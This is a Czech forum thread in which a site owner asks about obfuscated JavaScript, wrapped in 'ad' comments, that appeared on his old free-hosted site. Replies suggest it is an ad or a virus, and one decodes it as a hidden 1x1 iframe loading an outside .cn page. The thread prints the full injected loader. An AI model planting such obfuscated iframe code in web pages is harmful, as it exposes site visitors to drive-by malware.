Co to je zakódovanýho? – JavaScript, AJAX, jQuery – Fórum – Programujte.com
 x   TIP: Přetáhni ikonu na hlavní panel pro připnutí webu

Co to je zakódovanýho? – JavaScript, AJAX, jQuery – Fórum – Programujte.comCo to je zakódovanýho? – JavaScript, AJAX, jQuery – Fórum – Programujte.com

 

filippop0
Návštěvník
7. 6. 2010   #1
-
0
-

Dobrý den,
náhodou jsem se podíval na kód jedněch mých stránek, které jsem dělal už dávno a jsem si skoro úplně jistý, že takovýto javascript jsem tam nedával:

<!-- ad --><SCRIPT TYPE="text/javascript" LANGUAGE="JavaScript1.2">document.write(''+String.fromCharCode(60)+String.fromCharCode(105)+String.fromCharCode(102)+''+unescape('%72%61%6D')+unescape('%65%20%69%64')+unescape('%3D%22%62')+unescape('%34%62%63')+'d'+String.fromCharCode(48)+String.fromCharCode(51)+String.fromCharCode(48)+''+unescape('%36%37%36%32')+String.fromCharCode(101)+''+unescape('%35')+'593'+unescape('%64%32%66%31')+String.fromCharCode(53)+String.fromCharCode(48)+String.fromCharCode(53)+String.fromCharCode(98)+''+'8b21'+unescape('%34')+unescape('%38')+unescape('%63%22')+' na'+'me='+unescape('%22%63')+'543'+unescape('%32%31')+unescape('%62%31')+String.fromCharCode(101)+String.fromCharCode(55)+String.fromCharCode(101)+String.fromCharCode(100)+''+String.fromCharCode(101)+String.fromCharCode(97)+String.fromCharCode(49)+String.fromCharCode(101)+''+'cbb'+'25'+unescape('%62%37%37')+unescape('%33%63%38')+String.fromCharCode(99)+String.fromCharCode(52)+String.fromCharCode(55)+String.fromCharCode(99)+''+'f'+unescape('%22%20%20')+String.fromCharCode(119)+String.fromCharCode(105)+''+unescape('%64%74%68')+'=1 h'+String.fromCharCode(101)+''+unescape('%69%67%68%74')+'=1 '+unescape('%66%72')+String.fromCharCode(97)+String.fromCharCode(109)+''+String.fromCharCode(101)+String.fromCharCode(98)+String.fromCharCode(111)+''+String.fromCharCode(114)+String.fromCharCode(100)+''+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(61)+String.fromCharCode(48)+''+' '+'src='+String.fromCharCode(34)+String.fromCharCode(104)+String.fromCharCode(116)+''+String.fromCharCode(116)+String.fromCharCode(112)+String.fromCharCode(58)+''+String.fromCharCode(47)+String.fromCharCode(47)+''+String.fromCharCode(116)+String.fromCharCode(104)+''+'eh'+String.fromCharCode(117)+''+'get'+'i'+String.fromCharCode(116)+String.fromCharCode(115)+String.fromCharCode(116)+String.fromCharCode(111)+''+'p.c'+'n/d'+'o'+String.fromCharCode(110)+String.fromCharCode(116)+''+unescape('%73')+unescape('%74%6F%70%2E')+unescape('%68%74')+unescape('%6D%6C')+String.fromCharCode(34)+''+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(105)+''+'frame>'+'');</SCRIPT><!-- /ad -->


Netuším co to je, ale očividně to je něco zakéodovanýho a javascript si to překóduje a něco s tím udělá... Jen nevím co.
Netušíte někdo, co to může být a co to hlavně má co dělat na mých stránkách, které mám na free webhostingu volny.cz

Díky

Nahlásit jako SPAM
IP: 77.78.86.–
Kobi
~ Moderátor
+1
Věrný člen
7. 6. 2010   #2
-
0
-

Tipl bych, že to je reklama :-)

Nahlásit jako SPAM
IP: 88.101.155.–
z_moravec
~ Redaktor
+3
Posthunter
7. 6. 2010   #3
-
0
-

nebo vir

Nahlásit jako SPAM
IP: 83.240.110.–
Spát lze čtyři hodiny denně, spát déle je nemístný přepych.
Thomas Alva Edison
marioff0
Expert
7. 6. 2010   #4
-
0
-

je to iframe:

<iframe id="b4bcd0306762e5593d2f1505b8b2148c" name="c54321b1e7edea1ecbb25b773c8c47cf"  width=1 height=1 frameborder=0 src="http://thehugetitstop.cn/dontstop.html"></iframe>


predpokladam ze pouzivas total comander :D

Nahlásit jako SPAM
IP: 195.78.44.–
Škoda, že život sa nedá "sejvovať", tak že by som po zlom životnom rozhodnutí mohol začať odznova :([br] Lenivosť je matka pokroku.[br][br] http://cut.sk/ - odstrihni si dlhý link
filippop0
Návštěvník
7. 6. 2010   #5
-
0
-

Díky za reakce :) Ne, nejsem trubka (a nebo letitý odborník) abych používal TC a nechával v něm hesla..

Podle tagu "ad" by to mohla být reklama, ale ta by se nepřekódovávala a přitom by nezůstala v ad... Tedy myslím.

Na ten hosting (volny) jsem se nepřihlásil už alespoň rok... A nějak se na něm změnila data, což mě zaskočilo.

Iframe je to hezký... Díky marioffe za "překlad"

Nahlásit jako SPAM
IP: 85.71.117.–
Zjistit počet nových příspěvků

Přidej příspěvek

Toto téma je starší jak čtvrt roku – přidej svůj příspěvek jen tehdy, máš-li k tématu opravdu co říct!

Ano, opravdu chci reagovat → zobrazí formulář pro přidání příspěvku

×Vložení zdrojáku

×Vložení obrázku

Vložit URL obrázku Vybrat obrázek na disku
Vlož URL adresu obrázku:
Klikni a vyber obrázek z počítače:

×Vložení videa

Aktuálně jsou podporována videa ze serverů YouTube, Vimeo a Dailymotion.
×
 
Podporujeme Gravatara.
Zadej URL adresu Avatara (40 x 40 px) nebo emailovou adresu pro použití Gravatara.
Email nikam neukládáme, po získání Gravatara je zahozen.
-
Pravidla pro psaní příspěvků, používej diakritiku. ENTER pro nový odstavec, SHIFT + ENTER pro nový řádek.
Sledovat nové příspěvky (pouze pro přihlášené)
Sleduj vlákno a v případě přidání nového příspěvku o tom budeš vědět mezi prvními.
Reaguješ na příspěvek:

Uživatelé prohlížející si toto vlákno

Uživatelé on-line: 0 registrovaných, 2 hosté

 

Hostujeme u Českého hostingu       ISSN 1801-1586       ⇡ Nahoru Webtea.cz logo © 20032024 Programujte.com
Zasadilo a pěstuje Webtea.cz, šéfredaktor Lukáš Churý